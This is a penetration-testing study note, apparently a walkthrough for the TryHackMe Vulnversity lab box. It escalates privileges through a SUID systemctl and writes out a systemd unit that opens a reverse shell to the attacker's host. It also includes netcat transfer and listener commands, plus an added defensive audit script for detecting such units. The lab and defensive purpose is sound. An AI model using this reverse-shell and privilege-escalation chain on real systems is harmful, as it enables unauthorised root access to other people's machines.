Progressive OSCP
Vulnversity (Privilege Escalation)

Misconfigured Permissions — sudo/SUID


Last updated 4 years ago


Practice box

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find writable files/directories

find . -maxdepth 2 -type f -writable

or

find . -maxdepth 2 -type d -writable

2. Transfer the payload (there might be other ways)

Start a listener on the target to receive the file

nc -vl 44444 > root.service

Send the file to the target

nc -n TargetIP 44444 < root.service

3. Start listening on port 9999

nc -lvnp 9999

4. Execute the payload (assuming the file is under /var/tmp)

/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
/bin/systemctl start root

5. The listener on port 9999 receives a root shell
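
The defender's view of the steps above, as an added example that is not part of the original writeup: it checks a binary for the setuid bit and lists unit symlinks that resolve outside the standard unit directories, which is the trace the `systemctl enable /var/tmp/root.service` output in step 4 leaves behind. The function names, the TRUSTED_DIRS list and the demo tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: defensive audit for the misconfiguration this writeup relies on.
# TRUSTED_DIRS is an assumption; adjust it for your distribution.
TRUSTED_DIRS="/etc/systemd/system /usr/lib/systemd/system /lib/systemd/system /run/systemd"

# Succeeds if the file has the setuid bit (systemctl should never have it).
has_suid() { [ -u "$1" ]; }

# Succeeds if the path lies under one of TRUSTED_DIRS.
in_trusted_dir() {
    for d in $TRUSTED_DIRS; do
        case "$1" in "$d"/*) return 0 ;; esac
    done
    return 1
}

# Print "link -> target" for each symlink under unit directory $1 whose
# resolved target is outside TRUSTED_DIRS (e.g. a unit linked from /var/tmp).
audit_unit_links() {
    find "$1" -type l 2>/dev/null | while IFS= read -r link; do
        target=$(readlink -f -- "$link" 2>/dev/null) || target=$(readlink -- "$link")
        [ "$target" = /dev/null ] && continue    # masked unit, not a finding
        in_trusted_dir "$target" || printf '%s -> %s\n' "$link" "$target"
    done
}

# Demo on a constructed tree (not a real host), mirroring the symlinks
# that `systemctl enable /var/tmp/root.service` reports creating.
demo() {
    root=$(cd "$(mktemp -d)" && pwd -P)
    mkdir -p "$root/etc/systemd/system/multi-user.target.wants" \
             "$root/usr/lib/systemd/system" "$root/var/tmp"
    touch "$root/usr/lib/systemd/system/ssh.service" "$root/var/tmp/root.service"
    ln -s "$root/usr/lib/systemd/system/ssh.service" \
          "$root/etc/systemd/system/multi-user.target.wants/ssh.service"
    ln -s "$root/var/tmp/root.service" "$root/etc/systemd/system/root.service"
    ln -s "$root/var/tmp/root.service" \
          "$root/etc/systemd/system/multi-user.target.wants/root.service"
    TRUSTED_DIRS="$root/etc/systemd/system $root/usr/lib/systemd/system"
    audit_unit_links "$root/etc/systemd/system"
    rm -rf "$root"
}

demo
```

On a real host, run `audit_unit_links /etc/systemd/system` and `has_suid "$(command -v systemctl)"` with the default TRUSTED_DIRS; any output from the first or success from the second warrants investigation.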

Expand Knowledge

6. Alternative solution:

https://tryhackme.com/room/vulnversity
https://gtfobins.github.io/gtfobins/systemctl/
https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory
https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49